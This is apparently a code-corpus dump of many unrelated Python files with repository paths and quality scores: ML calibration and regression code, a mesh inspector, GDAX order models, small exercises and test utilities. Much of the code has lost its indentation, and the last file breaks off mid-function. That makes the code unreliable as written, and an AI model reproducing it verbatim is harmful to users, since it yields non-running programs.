res[ss + 'mcc'] = mcc_res['mcc']
res.update({ss + 'plattbin_acc': acc, ss + 'plattbin_ece': ece})
if do_tscal == True:
calibrator = TScalCalibrator(num_bins=20)
calibrator.train_calibration(probs_tr.cpu(), labels_tr.cpu())
calibrated_probs_eval = torch.FloatTensor(calibrator.calibrate(probs_eval.cpu()))
ece = cal.get_ece(calibrated_probs_eval.numpy(), labels_eval.numpy(), num_bins = 20)
acc = torch.sum(torch.argmax(calibrated_probs_eval, dim = -1) == labels_eval).item() * 1.0 / labels_eval.size(0)
if data_args.task_name.lower() == 'cola':
mcc_res = trainer.compute_metrics(EvalPrediction(predictions = torch.log(calibrated_probs_eval).numpy(), label_ids = labels_eval.numpy()))
res[ss + 'mcc'] = mcc_res['mcc']
res.update({ss + 'tscal_acc': acc, ss + 'tscal_ece': ece})
logger.info('cal_res: %s', str(res))
return res
if my_args.do_eval_calibration:
logger.info("*** do calbiration ***")
#if data_args.task_name.lower() == 'cola':
#it's cola, let's do evaluate for mcc
#res = trainer.evaluate(eval_dataset = dataset_cal_dev2)
set_seed(training_args.seed) #set seed again before eval
drawcal_res = trainer.eval_calibration(dataset_cal_dev2, verbose = True, fig_fn = training_args.output_dir + '/{}_calibration.pdf'.format(data_args.task_name))
save_fn = training_args.output_dir + '/drawcal.save'
logger.info('saving drawcal_res to %s', save_fn)
torch.save(drawcal_res, save_fn)
cal_res = do_cal(trainer, dataset_cal_dev2, do_postcal = False, ss = 'cal_ori_')
final_eval_results.update(cal_res)
if my_args.do_eval_scaling_binning_calibration:
logger.info('*** do scaling_binning calibration ***')
set_seed(training_args.seed)
cal_res = {}
cal_res.update(do_cal(trainer, dataset_cal_dev2, do_postcal = True, do_plattbin = False, do_tscal = True, tr_d = dataset_cal_dev1, ss = 'cal_dev_'))
cal_res.update(do_cal(trainer, dataset_cal_dev2, do_postcal = True, do_plattbin = False, do_tscal = True, tr_d = dataset_cal_tr, ss = 'cal_train_'))
logger.info('===scaling_binning_calibration %s', str(cal_res))
final_eval_results.update(cal_res)
if training_args.do_predict:
logging.info("*** Test ***")
test_datasets = [test_dataset]
if data_args.task_name == "mnli":
mnli_mm_data_args = dataclasses.replace(data_args, task_name="mnli-mm")
test_datasets.append(
GlueDataset(mnli_mm_data_args, tokenizer=tokenizer, mode="test", cache_dir=model_args.cache_dir)
)
for test_dataset in test_datasets:
predictions = trainer.predict(test_dataset=test_dataset).predictions
if output_mode == "classification":
predictions = np.argmax(predictions, axis=1)
output_test_file = os.path.join(
training_args.output_dir, f"test_results_{test_dataset.args.task_name}.txt"
)
if trainer.is_world_master():
with open(output_test_file, "w") as writer:
logger.info("***** Test results {} *****".format(test_dataset.args.task_name))
writer.write("index\tprediction\n")
for index, item in enumerate(predictions):
if output_mode == "regression":
writer.write("%d\t%3.3f\n" % (index, item))
else:
item = test_dataset.get_labels()[item]
writer.write("%d\t%s\n" % (index, item))
if my_args.do_energy_analysis:
logger.info('*** do_energy_analysis ***')
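        # Descriptive note: this block scores dev examples with the NCE head's energy
        # (return_d['nce_logits']), compares predictions against a task-specific baseline
        # RoBERTa classifier, saves energies/probabilities to dev_energy.save, and prints
        # the lowest- and highest-energy examples for inspection.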
eval_dataloader = trainer.get_eval_dataloader(dataset_cal_dev2)
logger.info('loading baseline model...')
if data_args.task_name.lower() == 'sst-2':
base_model = MyRobertaForSequenceClassification.from_pretrained('./exps/glue_baseline_roberta-base/SST-2/LR2e-5BA32MAXSTEP5233WARMSTEP314/')
if data_args.task_name.lower() == 'qnli':
base_model = MyRobertaForSequenceClassification.from_pretrained('./exps/glue_baseline_roberta-base/QNLI/LR2e-5BA32MAXSTEP8278WARMSTEP496')
if data_args.task_name.lower() == 'mrpc':
base_model = MyRobertaForSequenceClassification.from_pretrained('./exps/glue_baseline_roberta-base/MRPC/LR1e-5BA16MAXSTEP2296WARMSTEP137')
if data_args.task_name.lower() == 'mnli':
base_model = MyRobertaForSequenceClassification.from_pretrained('./exps/glue_baseline_roberta-base/MNLI/LR2e-5BA32MAXSTEP30968WARMSTEP1858/')
base_model = base_model.cuda()
lis_energy, lis_logits, lis_logits_base = [], [], []
for step, inputs in enumerate(eval_dataloader):
has_labels = any(inputs.get(k) is not None for k in ["labels", "lm_labels", "masked_lm_labels"])
for k, v in inputs.items():
inputs[k] = v.cuda()
return_d = {}
model.eval(); base_model.eval();
with torch.no_grad():
outputs = base_model(**inputs)
lis_logits_base.append(outputs[1])
inputs['special_mode'] = 'nce_noise'
inputs['nce_mode'] = my_args.nce_mode
inputs['return_d'] = return_d
inputs['nce_feed_type'] = 'data'
inputs['nce_noise_ratio'] = my_args.nce_noise_ratio
outputs = model(**inputs)
lis_energy.append(return_d['nce_logits'])
lis_logits.append(outputs[1])
all_energy = torch.cat(lis_energy, dim = 0).view(-1)
all_probs = torch.softmax(torch.cat(lis_logits, dim = 0), dim = -1)
all_probs_base = torch.softmax(torch.cat(lis_logits_base, dim = 0), dim = -1)
sorted_idx = all_energy.sort(descending = False)[1]
save_fn = training_args.output_dir + '/dev_energy.save'
logger.info('saving all_energy to %s', save_fn)
torch.save({'all_energy': all_energy.cpu(), 'all_probs': all_probs.cpu(), 'all_probs_base': all_probs_base.cpu()}, save_fn)
print('low energy:')
for idx in sorted_idx[:10].tolist():
print(idx, '\tenergy:', all_energy[idx].item(), 'prediction prob:', all_probs[idx].tolist(), 'prediction prob baseline:', all_probs_base[idx].tolist(), 'label:', dataset_cal_dev2[idx].label, 'text:', tokenizer.decode(dataset_cal_dev2[idx].input_ids[:100]))
print('high energy:')
for idx in sorted_idx[-10:].tolist():
if torch.argmax(all_probs_base[idx]).item() != dataset_cal_dev2[idx].label:
print(idx, '\tenergy:', all_energy[idx].item(), 'prediction prob:', all_probs[idx].tolist(), 'prediction prob baseline:', all_probs_base[idx].tolist(), 'label:', dataset_cal_dev2[idx].label, 'text:', tokenizer.decode(dataset_cal_dev2[idx].input_ids[:70]))
logger.info('output_dir: %s', training_args.output_dir)
if my_args.train_mode == 'nce_noise':
logger.info('===FINAL NCE_EVAL RESULT===')
report_str = '[EVAL_DATA] '
for idx in final_nce_eval_results: report_str += idx + ':' + str(final_nce_eval_results[idx])[:5] + ', '
logger.info('%s', report_str)
report_str = '[TRAIN_DATA] '
for idx in final_nce_train_results: report_str += idx + ':' + str(final_nce_train_results[idx])[:5] + ', '
logger.info('%s', report_str)
"""
logger.info('===FINAL CHECKLIST_EVAL RESULTS===')
report_str, ll = '', []
for idx in final_checklist_eval_results:
if idx != 'AVG':
report_str += idx + ':' + str(final_checklist_eval_results[idx] * 100)[:5] + '%, '
#ll.append(final_checklist_eval_results[idx])
logger.info('%s AVG: %s', report_str, str(final_checklist_eval_results['AVG'] * 100)[:5] + '%')
"""
logger.info('===FINAL EVAL RESULTS===')
report_str = ''
for idx in final_eval_results: report_str += idx + ':' + str(final_eval_results[idx])[:5] + ', '
logger.info('%s', report_str)
if final_evalres_savefn is not None:
logger.info(final_evalres_savefn)
return eval_results
def _mp_fn(index):
# For xla_spawn (TPUs)
main()
if __name__ == "__main__":
main()
| 1.78125 | 2 |
tools/python/myriad/__init__.py | TU-Berlin-DIMA/myriad-toolkit | 15 | 10872 | <filename>tools/python/myriad/__init__.py
__all__ = [ "assistant", "event", "error" ] | 1.054688 | 1 |
Python/Advanced/Tuples And Sets/Lab/SoftUni Party.py | EduardV777/Softuni-Python-Exercises | 0 | 10873 | guests=int(input())
reservations=set([])
while guests!=0:
reservationCode=input()
reservations.add(reservationCode)
guests-=1
while True:
r=input()
if r!="END":
reservations.discard(r)
else:
print(len(reservations))
VIPS=[]; Regulars=[]
for e in reservations:
if e[0].isnumeric():
VIPS.append(e)
else:
Regulars.append(e)
VIPS.sort(); Regulars.sort()
for k in VIPS:
print(k)
for k in Regulars:
print(k)
break | 3.625 | 4 |
locale/pot/api/plotting/_autosummary/pyvista-Plotter-remove_all_lights-1.py | tkoyama010/pyvista-doc-translations | 4 | 10874 | <filename>locale/pot/api/plotting/_autosummary/pyvista-Plotter-remove_all_lights-1.py
# Create a plotter and remove all lights after initialization.
# Note how the mesh rendered is completely flat
#
import pyvista as pv
plotter = pv.Plotter()
plotter.remove_all_lights()
plotter.renderer.lights
# Expected:
## []
_ = plotter.add_mesh(pv.Sphere(), show_edges=True)
plotter.show()
#
# Note how this differs from a plot with default lighting
#
pv.Sphere().plot(show_edges=True, lighting=True)
| 2.109375 | 2 |
einsum.py | odiak/einsum | 0 | 10875 | from typing import Dict, Tuple
import numpy as np
def einsum(expr: str, *args: Tuple[np.ndarray, ...], **kwargs) -> np.ndarray:
(a, b) = map(str.strip, expr.split("->"))
a_ = list(
map(lambda s: list(map(str.strip, s.split(","))), map(str.strip, a.split(";")))
)
b_ = list(map(str.strip, b.split(",")))
chars = "abcdefghijklmnopqrstuvwxyz"
char_map: Dict[str, str] = {}
i = 0
for cs in a_:
for c in cs:
if c not in char_map:
char_map[c] = chars[i]
i += 1
for c in b_:
if c not in char_map:
char_map[c] = chars[i]
i += 1
expr_ = "->".join(
[
",".join(map(lambda ss: "".join(map(lambda s: char_map[s], ss)), a_)),
"".join(map(lambda s: char_map[s], b_)),
]
)
return np.einsum(expr_, *args, **kwargs)
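

# Minimal usage sketch (assumed example, not part of the original module): the named-axis
# expression below maps to np.einsum("ab,bc->ac"), i.e. an ordinary matrix product.
if __name__ == "__main__":
    x = np.arange(6).reshape(2, 3)
    y = np.arange(12).reshape(3, 4)
    out = einsum("row,inner ; inner,col -> row,col", x, y)
    assert np.allclose(out, x @ y)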
| 2.890625 | 3 |
aarhus/get_roots.py | mikedelong/aarhus | 0 | 10876 | <reponame>mikedelong/aarhus
import json
import logging
import os
import pickle
import sys
import time
import pyzmail
# http://mypy.pythonblogs.com/12_mypy/archive/1253_workaround_for_python_bug_ascii_codec_cant_encode_character_uxa0_in_position_111_ordinal_not_in_range128.html
reload(sys)
sys.setdefaultencoding("utf8")
logging.basicConfig(format='%(asctime)s : %(levelname)s :: %(message)s', level=logging.DEBUG)
def process_folder(arg_folder, arg_reference, arg_in_or_out, arg_document_count_limit):
result = dict()
document_count = 0
no_references_count = 0
references_count = 0
message_id_count = 0
for root, subdirectories, files in os.walk(arg_folder):
for current in files:
# first get the references node
if document_count < arg_document_count_limit:
current_full_file_name = os.path.join(root, current)
if document_count % 1000 == 0 and document_count > 0:
logging.debug("%d %s", document_count, current_full_file_name)
references, message = get_references(current_full_file_name)
if 'references' in references.keys():
# if references.has_key('references'):
references_count += 1
else:
no_references_count += 1
document_count += 1
if 'message-id' in references.keys():
message_id_count += 1
if arg_reference in references.keys() and arg_in_or_out:
result[current] = message
elif arg_reference not in references.keys() and not arg_in_or_out:
result[current] = message
logging.info('documents : %d message-id: %d references: %d no references: %d' % (
document_count, message_id_count, references_count, no_references_count))
return result
def get_references(current_file):
result = {}
with open(current_file, 'rb') as fp:
message = pyzmail.message_from_file(fp)
if 'Message-Id' in message.keys():
result['message-id'] = message['Message-Id']
elif 'Message-ID' in message.keys():
result['message-id'] = message['Message-ID']
elif 'Message-id' in message.keys():
result['message-id'] = message['Message-id']
else:
logging.warn('no message id in file %s', current_file)
logging.info([key for key in message.keys()])
if 'References' in message.keys():
references = message['References'].split(' ')
result['references'] = references
if 'In-Reply-To' in message.keys():
result['in-reply-to'] = message['In-Reply-To']
return result, message
def run():
start_time = time.time()
with open('roots-settings.json') as data_file:
data = json.load(data_file)
logging.debug(data)
input_folder = data['input_folder']
document_count_limit = data['document_count_limit']
if document_count_limit == -1:
document_count_limit = sys.maxint
reference_of_interest = data['reference']
# our internal keys are always lowercase, so we want to be sure
# to use a lowercase reference for comparisons
reference_of_interest = reference_of_interest.lower()
in_or_out = data['reference_in']
in_or_out = bool(in_or_out)
pickle_file = data['output_pickle_file']
documents_of_interest = process_folder(input_folder, reference_of_interest, in_or_out, document_count_limit)
logging.info(
'found %d documents of interest: %s' % (len(documents_of_interest), sorted(documents_of_interest.keys())))
with open(pickle_file, 'wb') as output_fp:
pickle.dump(documents_of_interest, output_fp)
logging.info('wrote pickled dictionary to %s.' % pickle_file)
finish_time = time.time()
elapsed_hours, elapsed_remainder = divmod(finish_time - start_time, 3600)
elapsed_minutes, elapsed_seconds = divmod(elapsed_remainder, 60)
logging.info("Time: {:0>2}:{:0>2}:{:05.2f}".format(int(elapsed_hours), int(elapsed_minutes), elapsed_seconds))
if __name__ == '__main__':
run()
| 2.046875 | 2 |
python/760.find-anagram-mappings.py | stavanmehta/leetcode | 0 | 10877 | <filename>python/760.find-anagram-mappings.py<gh_stars>0
from typing import List


class Solution:
    def anagramMappings(self, A: List[int], B: List[int]) -> List[int]:
        # Map each value in B to one of its indices, then translate each element of A.
        index_of = {value: i for i, value in enumerate(B)}
        return [index_of[value] for value in A]
| 2.03125 | 2 |
src/jdk.internal.vm.compiler/.mx.graal/mx_graal.py | siweilxy/openjdkstudy | 2 | 10878 | <filename>src/jdk.internal.vm.compiler/.mx.graal/mx_graal.py
#
# ----------------------------------------------------------------------------------------------------
#
# Copyright (c) 2007, 2015, Oracle and/or its affiliates. All rights reserved.
# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
#
# This code is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 only, as
# published by the Free Software Foundation.
#
# This code is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# version 2 for more details (a copy is included in the LICENSE file that
# accompanied this code).
#
# You should have received a copy of the GNU General Public License version
# 2 along with this work; if not, write to the Free Software Foundation,
# Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
# or visit www.oracle.com if you need additional information or have any
# questions.
#
# ----------------------------------------------------------------------------------------------------
import mx
if mx.get_jdk(tag='default').javaCompliance < "1.9":
mx.abort('JAVA_HOME is not a JDK9: ' + mx.get_jdk(tag='default').home)
from mx_graal_9 import mx_post_parse_cmd_line, run_vm, get_vm, isJVMCIEnabled # pylint: disable=unused-import
import mx_graal_bench # pylint: disable=unused-import
| 1.960938 | 2 |
linear_regression.py | wail007/ml_playground | 0 | 10879 | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import multivariate_normal
class _LinearModel(object):
def __init__(self):
self.w = None
def fit(self, x, y):
pass
def predict(self, x):
return np.dot(x, self.w)
def cost(self, x, y):
pass
def precision(self, x, y):
p = self.predict(x)
return (1.0 / len(p)) * np.sum(p == y)
class LeastSquareRegression(_LinearModel):
def __init__(self):
super(LeastSquareRegression, self).__init__()
def fit(self, x, y):
xt = x.transpose()
self.w = np.linalg.pinv(np.dot(xt, x)).dot(xt).dot(y)
def cost(self, x, y):
""" Residual Sum of Squares """
r = y - np.dot(x, self.w)
rt= np.transpose(r)
return (1.0 / len(x)) * np.trace(np.dot(rt, r))
class RidgeRegression(LeastSquareRegression):
def __init__(self, incr=0.1, min_change=0.001):
super(RidgeRegression, self).__init__()
self.incr = incr
self.min_change = min_change
def fit(self, x, y):
xtrain, xval = np.split(x, [int(0.7*len(x))])
ytrain, yval = np.split(y, [int(0.7*len(y))])
alpha = 0.0
best_alpha = 0.0
best_cost = float("inf")
old_cost = float("inf")
new_cost = float("inf")
while True:
self._fit(xtrain, ytrain, alpha)
new_cost = self.cost(xval, yval)
if new_cost < best_cost:
best_cost = new_cost
best_alpha = alpha
#print("cost: %f, alpha: %f" % (best_cost, best_alpha))
if abs(new_cost - old_cost) < self.min_change:
break
old_cost = new_cost
alpha += self.incr
self._fit(xtrain, ytrain, best_alpha)
def _fit(self, x, y, alpha):
x = x[:,1:]
xt = np.transpose(x)
self.w = np.linalg.pinv(np.dot(xt, x) + alpha * np.eye(x.shape[1])).dot(xt).dot(y)
bias = np.mean(y, axis=0, keepdims=True) - np.dot(np.mean(x, axis=0, keepdims=True), self.w)
self.w = np.vstack([bias, self.w])
class LeastSquareClassification(LeastSquareRegression):
def __init__(self):
super(LeastSquareClassification, self).__init__()
def predict(self, x):
return super(LeastSquareClassification, self).predict(x).argmax(axis=1)
class RidgeClassification(RidgeRegression):
def __init__(self, incr=0.1, min_change=0.001):
super(RidgeClassification, self).__init__(incr, min_change)
def predict(self, x):
return super(RidgeClassification, self).predict(x).argmax(axis=1)
class LDAClassification(_LinearModel):
def __init__(self):
self.w = None
self.priors = None
self.means = []
self.covs = []
def fit(self, x, y):
k = y.shape[1]
y_arg = np.argmax(y, axis=1)
class_count = np.sum (y, axis=0, keepdims=True)
self.priors = (1.0 / len(y)) * np.sum (y, axis=0, keepdims=True)
self.w = self._lda(x, y)
x_proj = np.dot(x, self.w)
means = (1.0 / class_count.T) * np.dot(y.T, x_proj)
for i in xrange(k):
xk_proj = x_proj[y_arg==i]
self.means.append(np.mean(xk_proj, axis = 0))
self.covs .append(np.cov (xk_proj, rowvar=False))
def predict(self, x):
k = self.w.shape[1]
x_proj = np.dot(x, self.w)
likelihood = np.column_stack([multivariate_normal.pdf(x_proj, self.means[i], self.covs[i]) for i in xrange(k)])
posterior = (likelihood * self.priors)
posterior = posterior / np.sum(posterior, axis=1, keepdims=True)
return np.argmax(posterior, axis=1)
def _lda(self, x, y):
k = y.shape[1]
y_arg = np.argmax(y, axis=1)
class_count= np.sum (y, axis=0, keepdims=True)
total_mean = np.mean(x, axis=0, keepdims=True)
class_mean = (1.0 / class_count.T) * np.dot(y.T, x)
mk_m = class_mean - total_mean
b_cov = np.dot(class_count * mk_m.T, mk_m)
w_cov = np.zeros(b_cov.shape)
for i in xrange(k):
xk = x[y_arg == i]
xk_mk = xk - class_mean[i]
w_cov += np.dot(xk_mk.T, xk_mk)
eig_vals, eig_vecs = np.linalg.eig(np.dot(np.linalg.pinv(w_cov), b_cov))
eig_vals = np.abs(eig_vals)
eig_args = np.argsort(eig_vals)[::-1][:k]
return eig_vecs[:, eig_args]
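

if __name__ == "__main__":
    # Hypothetical smoke test (not part of the original module): fit ordinary least squares
    # on y = 1 + 2*x, with an explicit bias column prepended as these models expect.
    rng = np.random.RandomState(0)
    x_raw = rng.rand(100, 1)
    x = np.hstack([np.ones((100, 1)), x_raw])
    y = 1.0 + 2.0 * x_raw + 0.01 * rng.randn(100, 1)
    model = LeastSquareRegression()
    model.fit(x, y)
    print("weights: %s, cost: %.6f" % (model.w.ravel(), model.cost(x, y)))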
| 2.953125 | 3 |
pygments_lexer_solidity/__init__.py | veox/pygments-lexer-solidity | 2 | 10880 | from .lexer import SolidityLexer, YulLexer
__all__ = ['SolidityLexer', 'YulLexer']
| 1.03125 | 1 |
optimal_buy_gdax/history.py | coulterj/optimal-buy-gdax | 0 | 10881 | #!/usr/bin/env python3
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, String, Float, DateTime, Integer
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
Base = declarative_base()
class Order(Base):
__tablename__ = 'orders'
id = Column(Integer, primary_key=True)
currency = Column(String)
price = Column(Float)
size = Column(Float)
gdax_order_id = Column(String)
created_at = Column(DateTime)
class Withdrawal(Base):
__tablename__ = 'withdrawals'
id = Column(Integer, primary_key=True)
currency = Column(String)
amount = Column(Float)
crypto_address = Column(String)
gdax_withdrawal_id = Column(String)
class Deposit(Base):
__tablename__ = 'deposits'
id = Column(Integer, primary_key=True)
currency = Column(String)
amount = Column(Float)
payment_method_id = Column(String)
payout_at = Column(DateTime)
gdax_deposit_id = Column(String)
def get_session(engine):
engine = create_engine(engine)
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
return session
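

# Hypothetical usage sketch (assumed engine URL, not part of the original module):
#   session = get_session('sqlite:///history.db')
#   session.add(Order(currency='BTC-USD', price=100.0, size=0.01,
#                     gdax_order_id='example-id', created_at=datetime.datetime.utcnow()))
#   session.commit()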
| 2.75 | 3 |
vmtkScripts/vmtkmeshboundaryinspector.py | ramtingh/vmtk | 0 | 10882 | <filename>vmtkScripts/vmtkmeshboundaryinspector.py
#!/usr/bin/env python
## Program: VMTK
## Module: $RCSfile: vmtkmeshboundaryinspector.py,v $
## Language: Python
## Date: $Date: 2006/05/26 12:35:13 $
## Version: $Revision: 1.3 $
## Copyright (c) <NAME>, <NAME>. All rights reserved.
## See LICENSE file for details.
## This software is distributed WITHOUT ANY WARRANTY; without even
## the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
## PURPOSE. See the above copyright notices for more information.
from __future__ import absolute_import #NEEDS TO STAY AS TOP LEVEL MODULE FOR Py2-3 COMPATIBILITY
import vtk
import sys
from vmtk import vtkvmtk
from vmtk import vmtkrenderer
from vmtk import pypes
class vmtkMeshBoundaryInspector(pypes.pypeScript):
def __init__(self):
pypes.pypeScript.__init__(self)
self.Mesh = None
self.CellEntityIdsArrayName = 'CellEntityIds'
self.VolumeCellEntityId = 0
self.WallCellEntityId = 1
self.vmtkRenderer = None
self.OwnRenderer = 0
self.ReferenceSystems = None
self.SetScriptName('vmtkmeshboundaryinspector')
self.SetScriptDoc('display a 3D render of the mesh with individual boundary groups colored and labeled')
self.SetInputMembers([
['Mesh','i','vtkUnstructuredGrid',1,'','the input mesh','vmtkmeshreader'],
['CellEntityIdsArrayName','entityidsarray','str',1,''],
['VolumeCellEntityId','volumeid','int',1],
['WallCellEntityId','wallid','int',1],
['vmtkRenderer','renderer','vmtkRenderer',1,'','external renderer']])
self.SetOutputMembers([
['ReferenceSystems','o','vtkPolyData',1,'','the output reference systems with boundary information','vmtksurfacewriter']
])
def Execute(self):
if not self.Mesh:
self.PrintError('Error: No input mesh.')
return
if not self.CellEntityIdsArrayName:
self.PrintError('Error: No input CellEntityIdsArrayName.')
return
if not self.vmtkRenderer:
self.vmtkRenderer = vmtkrenderer.vmtkRenderer()
self.vmtkRenderer.Initialize()
self.OwnRenderer = 1
self.vmtkRenderer.RegisterScript(self)
threshold = vtk.vtkThreshold()
threshold.SetInputData(self.Mesh)
threshold.ThresholdByUpper(self.VolumeCellEntityId+0.5)
threshold.SetInputArrayToProcess(0,0,0,1,self.CellEntityIdsArrayName)
threshold.Update()
boundaryMesh = threshold.GetOutput()
boundaryMesh.GetCellData().SetActiveScalars(self.CellEntityIdsArrayName)
boundaryMapper = vtk.vtkDataSetMapper()
boundaryMapper.SetInputData(boundaryMesh)
boundaryMapper.ScalarVisibilityOn()
boundaryMapper.SetScalarModeToUseCellData()
boundaryMapper.SetScalarRange(boundaryMesh.GetCellData().GetScalars().GetRange())
boundaryActor = vtk.vtkActor()
boundaryActor.SetMapper(boundaryMapper)
self.vmtkRenderer.Renderer.AddActor(boundaryActor)
wallThreshold = vtk.vtkThreshold()
wallThreshold.SetInputData(boundaryMesh)
wallThreshold.ThresholdByLower(self.WallCellEntityId+0.5)
wallThreshold.SetInputArrayToProcess(0,0,0,1,self.CellEntityIdsArrayName)
wallThreshold.Update()
wallMeshToSurface = vtk.vtkGeometryFilter()
wallMeshToSurface.SetInputConnection(wallThreshold.GetOutputPort())
wallMeshToSurface.Update()
boundaryReferenceSystems = vtkvmtk.vtkvmtkBoundaryReferenceSystems()
boundaryReferenceSystems.SetInputConnection(wallMeshToSurface.GetOutputPort())
boundaryReferenceSystems.SetBoundaryRadiusArrayName("BoundaryRadius")
boundaryReferenceSystems.SetBoundaryNormalsArrayName("BoundaryNormals")
boundaryReferenceSystems.SetPoint1ArrayName("Point1Array")
boundaryReferenceSystems.SetPoint2ArrayName("Point2Array")
boundaryReferenceSystems.Update()
self.ReferenceSystems = boundaryReferenceSystems.GetOutput()
cellEntityIdsArray = vtk.vtkIntArray()
cellEntityIdsArray.SetName(self.CellEntityIdsArrayName)
cellEntityIdsArray.SetNumberOfTuples(self.ReferenceSystems.GetNumberOfPoints())
self.ReferenceSystems.GetPointData().AddArray(cellEntityIdsArray)
boundaryThreshold = vtk.vtkThreshold()
boundaryThreshold.SetInputData(boundaryMesh)
boundaryThreshold.ThresholdByUpper(self.WallCellEntityId+0.5)
boundaryThreshold.SetInputArrayToProcess(0,0,0,1,self.CellEntityIdsArrayName)
boundaryThreshold.Update()
boundaryMeshToSurface = vtk.vtkGeometryFilter()
boundaryMeshToSurface.SetInputConnection(boundaryThreshold.GetOutputPort())
boundaryMeshToSurface.Update()
boundarySurface = boundaryMeshToSurface.GetOutput()
pointCells = vtk.vtkIdList()
surfaceCellEntityIdsArray = vtk.vtkIntArray()
surfaceCellEntityIdsArray.DeepCopy(boundarySurface.GetCellData().GetArray(self.CellEntityIdsArrayName))
self.PrintLog('')
for i in range(self.ReferenceSystems.GetNumberOfPoints()):
pointId = boundarySurface.FindPoint(self.ReferenceSystems.GetPoint(i))
boundarySurface.GetPointCells(pointId,pointCells)
cellId = pointCells.GetId(0)
cellEntityId = surfaceCellEntityIdsArray.GetValue(cellId)
cellEntityIdsArray.SetValue(i,cellEntityId)
origin = self.ReferenceSystems.GetPoint(i)
normal = self.ReferenceSystems.GetPointData().GetArray("BoundaryNormals").GetTuple3(i)
radius = self.ReferenceSystems.GetPointData().GetArray("BoundaryRadius").GetTuple1(i)
logLine = 'CellEntityId: %d\n' % cellEntityId
logLine += ' Origin: %f, %f, %f\n' % (origin[0],origin[1],origin[2])
logLine += ' Normal: %f, %f, %f\n' % (normal[0],normal[1],normal[2])
logLine += ' Radius: %f\n' % radius
self.PrintLog(logLine)
self.ReferenceSystems.GetPointData().SetActiveScalars(self.CellEntityIdsArrayName)
labelsMapper = vtk.vtkLabeledDataMapper();
labelsMapper.SetInputData(self.ReferenceSystems)
labelsMapper.SetLabelModeToLabelScalars()
labelsActor = vtk.vtkActor2D()
labelsActor.SetMapper(labelsMapper)
self.vmtkRenderer.Renderer.AddActor(labelsActor)
self.vmtkRenderer.Render()
if self.OwnRenderer:
self.vmtkRenderer.Deallocate()
if __name__=='__main__':
main = pypes.pypeMain()
main.Arguments = sys.argv
main.Execute()
| 2.1875 | 2 |
setup.py | sriz1/mudslide | 4 | 10883 | <filename>setup.py
from setuptools import setup
from distutils.util import convert_path
main_ns = {}
ver_path = convert_path('mudslide/version.py')
with open(ver_path) as ver_file:
exec(ver_file.read(), main_ns)
def readme():
with open("README.md") as f:
return f.read()
setup(
name='mudslide',
packages=['mudslide'],
version=main_ns['__version__'],
license='MIT',
description='Package to simulate nonadiabatic molecular dynamics using trajectory methods',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/smparker/mudslide',
download_url='https://github.com/smparker/mudslide/archive/v0.9.tar.gz',
keywords= ['science', 'chemistry', 'nonadiabatic dynamics'],
install_requires=[
'numpy>=1.19',
'scipy',
'typing_extensions'
],
test_suite='nose.collector',
tests_require=['nose'],
entry_points={
'console_scripts': [
'mudslide = mudslide.__main__:main',
'mudslide-surface = mudslide.surface:main'
]
},
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Chemistry',
'Topic :: Scientific/Engineering :: Physics',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8'
]
)
| 1.398438 | 1 |
src/sklearn/sklearn_random_forest_test.py | monkeychen/python-tutorial | 0 | 10884 | import csv
import joblib
from sklearn.metrics import accuracy_score
data = []
features = []
targets = []
feature_names = []
users = []
with open('satisfaction_feature_names.csv') as name_file:
column_name_file = csv.reader(name_file)
feature_names = next(column_name_file)[2:394]
with open('cza_satisfaction_train_0922.csv') as data_file:
csv_file = csv.reader(data_file)
idx = 0
for content in csv_file:
idx = idx + 1
if idx <= 10000:
continue
if idx > 50000:
break
content = content[:2] + list(map(float, content[2:]))
if len(content) != 0:
data.append(content)
features.append(content[2:394])
targets.append(content[-1])
users.append(content[1])
clf, sorted_feature_scores = joblib.load("cza_rf.pkl")
predict_result = clf.predict(features)
print(sorted_feature_scores)
print(accuracy_score(predict_result, targets))
result = list(zip(users, predict_result))
print(result[:10])
print(sum(predict_result))
print(sum([flag[1] for flag in result]))
with open("rf_predict_result.csv", "w", encoding="UTF-8") as w_file:
result_file = csv.writer(w_file)
for idx, row in enumerate(result):
if idx > 10:
break
row = list(row)
row.insert(0, 20200928)
result_file.writerow(row)
| 2.828125 | 3 |
py/test.py | BEARUBC/grasp-kernel | 1 | 10885 | class TestClass:
def __init__(self, list, name):
self.list = list
self.name = name
def func1():
print("func1 print something")
def func2():
print("func2 print something")
integer = 8
return integer
def func3():
print("func3 print something")
s = "func3"
return s
def func4():
print("func4 print something")
listIntegers = [1,2,3,4,5]
return listIntegers
def func5():
print("func5 print something")
listStrings = ["a","b","c","d","e"]
return listStrings
print("Hello World")
# test = TestClass()
| 3.625 | 4 |
tests/utils/_process_nonwin.py | chrahunt/quicken | 3 | 10886 | <reponame>chrahunt/quicken
"""Utilities for managing child processes within a scope - this ensures
tests run cleanly even on failure and also gives us a mechanism to
get debug info for our children.
"""
import logging
import os
import sys
from contextlib import contextmanager
from typing import ContextManager, List
import psutil
import process_tracker
process_tracker.install()
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG)
__all__ = [
"active_children",
"contained_children",
"disable_child_tracking",
"kill_children",
]
def _get_create_time(create_time):
"""Given basic process create time, return one that would
match psutil.
"""
boot_time = psutil.boot_time()
clock_ticks = os.sysconf("SC_CLK_TCK")
return boot_time + (create_time / clock_ticks)
def active_children() -> List[psutil.Process]:
"""Returns the active child processes.
"""
out = []
children = process_tracker.children()
for pid, create_time in children:
try:
process = psutil.Process(pid)
except psutil.NoSuchProcess:
continue
else:
if process.create_time() == _get_create_time(create_time):
out.append(process)
return out
@contextmanager
def contained_children(timeout=1, assert_graceful=True) -> ContextManager:
